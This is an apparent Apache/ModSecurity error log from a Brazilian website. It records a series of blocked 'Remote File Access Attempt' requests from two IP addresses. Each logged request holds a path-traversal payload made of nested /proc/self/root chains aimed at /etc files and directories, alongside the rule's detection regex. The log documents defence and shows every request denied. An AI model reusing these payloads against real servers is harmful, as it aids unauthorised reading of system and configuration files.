[Fri Mar 20 04:52:48.657451 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:54722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz80F1pVZ5mVmJwsFMMCwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:52:49.539109 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:50720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz80RCii7xarUs8iHZBVgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:52:50.427101 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.241.31:57078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz80vXLqtnMIWvjpaJ1OQAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:52:52.020255 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:57094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz81BCii7xarUs8iHZBWAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:53:43.746035 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:41404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9B-oXxyEfFpUF8f9eKQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:54:01.209573 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:47570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9GfHIg5MgXLBnicPWngAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:54:10.455866 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:60030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9IhCii7xarUs8iHZBlgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:54:16.386141 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:48798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9KOoXxyEfFpUF8f9ePgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:54:18.816791 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.243.128:48804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9KjJ3M9BSuKP7CAbtggAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:56:16.017454 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:45014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9oLninkcc-iUj5Ao6oQAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:56:17.303376 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:49668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz9ofHIg5MgXLBnicPW3gAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:57:05.880404 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:60222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz90QF0L0L-SsrnPo5EwgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:57:12.334868 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:37596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz92OoXxyEfFpUF8f9epwAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:57:16.127579 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:51432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz93Na6ubjKNq_cu4as7wAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:58:18.895063 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:51434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-Gta6ubjKNq_cu4atdwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:59:59.391748 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:39102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-f-oXxyEfFpUF8f9fLQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:00:07.075128 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:48220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-h7ninkcc-iUj5Ao7MQAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:00:11.412037 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:48232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-izJ3M9BSuKP7CAbuogAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:00:20.904074 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:35486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-kzJ3M9BSuKP7CAbusgAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:00:44.113798 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:57906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-rLninkcc-iUj5Ao7TAAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:01:40.909419 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:40674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz-5DJ3M9BSuKP7CAbvLAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
